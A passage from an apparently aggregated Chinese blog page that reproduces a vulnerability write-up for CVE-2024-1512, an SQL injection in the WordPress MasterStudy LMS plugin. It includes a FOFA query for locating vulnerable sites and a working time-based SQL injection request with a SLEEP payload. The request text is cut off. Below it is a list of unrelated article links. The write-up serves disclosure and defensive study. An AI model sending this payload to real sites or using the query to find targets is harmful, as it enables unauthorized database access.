当前位置: 首页 > news >正文

WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)

news 2025/8/5 14:09:24

0x01 产品简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。

0x02 漏洞概述

WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。

0x03 影响范围

WordPress Plugin MasterStudy LMS <= 3.2.5

0x04 复现环境

FOFA:

body="wp-content/plugins/masterstudy-lms-learning-management-system/"

0x05 漏洞复现

PoC

GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20
http://www.lryc.cn/news/343641.html

相关文章:

  • 初识Vue-组件通信(详解props和emit)
  • 二叉树的前序、中序、后序遍历的C++实现
  • golang中数组array和切片slice的区别
  • LSM-Tree 原理分析
  • 【代码随想录37期】Day01 二分查找 + 移除元素
  • GitPython 使用教程
  • MATLAB 基于规则格网的点云抽稀方法(自定义实现)(65)
  • 论文阅读】 ICCV-2021-3D Local Convolutional Neural Networks for Gait Recognition
  • 同一局域网如何从Windows系统拷贝文件到银河麒麟系统
  • 2024年华为OD机试真题-数的分解-(C++)-OD统一考试(C卷D卷)
  • vue-img-cutter 图片裁剪详解
  • PCL 点云中的平面点云提取
  • 4.用python爬取保存在text中的格式为m3u8的视频
  • 240503-关于Unity的二三事
  • 顺序栈的操作
  • STM32 各外设GPIO配置
  • React-hooks相关知识点总结
  • 20240508日记
  • Web实操(6),基础知识学习(24~)
  • JavaSE——方法详解
  • iBarcoder for Mac:一站式条形码生成软件
  • 学习R语言第六天
  • LeetCode算法题:9. 回文数(Java解法)
  • VALSE 2024 Workshop报告分享┆面向实际场景体验的多模态大模型DeepSeek VL
  • RFC 791 (1)-导论
  • 力扣hot100:199. 二叉树的右视图/437. 路径总和 III(dfs/回溯/树上前缀和/哈希表)
  • 浅谈 HTTPS
  • js手动实现unshift
  • Failed to get DISPLAY: Error: All configured authentication methods failed 解决方法
  • 随便聊一下 显控科技 控制屏 通过 RS485 接口 上位机 通讯 说明